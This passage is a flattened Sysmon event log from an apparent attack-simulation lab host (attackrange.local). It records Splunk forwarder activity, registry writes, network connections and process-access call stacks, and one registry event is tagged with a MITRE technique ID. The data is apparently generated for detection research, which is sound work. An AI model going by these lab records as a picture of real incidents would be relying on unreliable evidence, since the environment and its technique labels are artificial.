13241300x800000000000000010340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1042SetValue2021-03-31 12:07:32.288{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 23542300x800000000000000010339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:32.023{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37AA25715E975E6186B03E2BA4460B35,SHA256=265193D61DDB21A24B61099E16E592F8FE602EA25DA87FEC26C0E038CA518910,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:32.539{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53687-false10.0.1.12-8000- 13241300x800000000000000010351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000010350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000661e9) 13241300x800000000000000010349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261e-0x0c13e85b) 13241300x800000000000000010348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72626-0x6dd8505b) 13241300x800000000000000010347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262e-0xcf9cb85b) 13241300x800000000000000010346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000010345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000661e9) 13241300x800000000000000010344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261e-0x0c1cfcc1) 13241300x800000000000000010343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72626-0x6de164c1) 13241300x800000000000000010342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262e-0xcfa5ccc1) 23542300x800000000000000010341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:33.038{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80D253C4A478ED515F35076362B54708,SHA256=374128CF832819708709040778CC38B73B63E9774AB306E692F326BCF8B40DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:34.100{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5E3410BB412BE4E59EF25B0CBE4EADA,SHA256=E10EB053A4980A8EC82AAC31AE6481EF252D625481990379750CA99989F8BDAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:35.209{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CBD32C8039B1FDB1F2C6FD1A4DDD455,SHA256=EB7430140E1E42B707C0CE4396E9FCE731A583D56A5ACE1AED8CF272494A3298,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:36.209{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDBC1F34CD8816708363495449CB250,SHA256=EC748975A3AD9AECBC6A0639E7AAD5762DE4CB17EC62EFD86B4111515EBFB091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:37.224{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37AC3F6F3B04A0903FC8C0034F64BF09,SHA256=C1952EE8D4FA27CA879D39B7D78161903B3C5632EA28BE7258EFABFECBD3FC82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:38.240{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42490A772FDA9948E1A3F880A03C780,SHA256=6A3034A7820BAA06C451E6E3432CE3E6D343BF53A6C831DAA7562FB3EB4EA0C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:38.492{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53688-false10.0.1.12-8000- 23542300x800000000000000010358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:39.271{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D18C610CDF8913CDFB434C8D04B8ABD,SHA256=DFB411118DF789F0782030F0C057D73064F6FC6E49602BF908699EED2735511A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:40.333{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B830AFA92E9C2F6E248E1D503C72F2C,SHA256=42AC9A2309355B932F99EC943AFD34AC4D2C1D6FC1E32655CD1F00B574C6320F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:41.348{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C47460F6948C89E74587C8C60C9F4CF4,SHA256=1E00E376D48AEFF871A114BCE9307A92EACF3F0577E7DC39E69DAF5B79061334,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:41.005{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x72f5f46a) 23542300x800000000000000010363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:42.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D23C8BAE2A3811FDBD24AB318FFC9B7,SHA256=A5B315440D1A0168BE8BA59494473E8E8CE35914F09D8D5A9505CF264871FE94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:43.488{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7057B4D96AA9331CEC05DCB543EF280,SHA256=78A9F4CE09A351CF4934C5A8F6B76BA935D2BF44B5FD5554A44B497642474EEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:43.633{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53689-false10.0.1.12-8000- 23542300x800000000000000010367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:44.551{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07CCAF038197871C1D282678163C377,SHA256=3E10052ECAF3A2DA27FE9855203D92EA3D5E6451B9533BB38E92C2E03D859289,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x800000000000000010365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0CC6B52364349F29C7BE76219CA6054D,SHA256=11E21B75C4986E0C090F04A7F75362DD2D8F1CE63EC9D771943C9C34D816C0DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:45.566{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8170CCBAB273FEF5AAE74449BEF1FC93,SHA256=2138739B6AF3F18E134E66F2979910DDDD6B93D0E17228A5C666ECD97F999F92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:46.582{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=367FA486267D3BD5272B38691640F076,SHA256=1958ECE6527DEE85FE240DFE1EB41040D02EF1D3B3093D9115A366BB321AAB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:47.659{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C49A3E4ED07053B70EA7D8E27EB55E,SHA256=E0C88638F29A95C8E2FEE71F53E1ADC0D776919A8292E3678FB8730515D932C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:48.893{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:48.800{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA539C8C305B870AFD7D6B376F8B7D7D,SHA256=D636321209C213854E4121FA1443A16CB0E73A6A9E75AAAE38E316283FE3A1BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:49.831{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E063D24949200AD037728394B24A4CE,SHA256=AD2C372FD2602FC773D08891014690DD10627E46A25C3BAEB0532B0EF5BFBA80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:50.846{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EC27B6833E7D1AF9309013B6E01109A,SHA256=5D2442E74C09C1C29551B31D2E6BFC530CB1BE379FFC1C09386DAFE51DFC2194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:51.862{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26597D6F31174FD7DE45C5DAC85A7EE1,SHA256=8610C86ACD2CF04C0AD2904F7EE2B03F83BA58D460D52373479C2D64DC93CB80,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:49.570{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53691-false10.0.1.12-8000- 354300x800000000000000010376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:49.273{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53690-false10.0.1.12-8089- 23542300x800000000000000010379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:52.893{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31244585B0C5F0C4143049F3C4616D3A,SHA256=2FBE250B450C49CBC8576D9FAECE6160C3A0329A9A85F77F8264D6C733A9C4B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:53.924{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2A20F7D59960CC323B3A19F431D3D5,SHA256=C751C774B5829566946D3B915890E4A5B945216F39F6A7B86DC005FFD5AE2DE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:54.986{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91FD65542D10CA25330898A98B6FB301,SHA256=58DCDF79A52243D459348C6182E814E07414AC5AB976AB5640E59645FD22F72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:56.017{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5F46448B2611855CAC8E635420FA2E,SHA256=6E072383A8ADB86C7F2AEA39F028C0044C2988B96DCBA77351A9AA1296D29C76,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:55.523{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53692-false10.0.1.12-8000- 23542300x800000000000000010383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:57.032{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30FEA8917683F8272483963CDD22B66F,SHA256=54BE2D49A722EC89B3CB7E0BE1D7E17ED60C667E1BE4E806FDD8CEF1AF9C2773,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:58.032{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=375B8E1126FF4026FBCB452D68DF974A,SHA256=0510541BA36A5A25DD7CE64FF3DE1EB0D1CAFC1ABD123442E5EC3480F1EDD4FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:59.079{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9C33EB9D4FB1985F9D068072DED0E8,SHA256=5B0C24EECE92EB94E9ADBC684A2C74D6A6CFCC02BA3B2FD0C72ED2B5FFB42904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:00.110{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31A67D950617861628398DD1089CF8BB,SHA256=91F5E9ED48C1D78F90EF3F22A54FE359B4CCD439978254245FEFB98C11FF93BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:01.109{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812FA2FAE4D6D4888AD0EBCE9318029D,SHA256=7386FE458674261A125C7EE7E3C107AB0ABD9479C2B7E7EB931CA817B38BFB05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6622-6064-6001-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:02.968{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 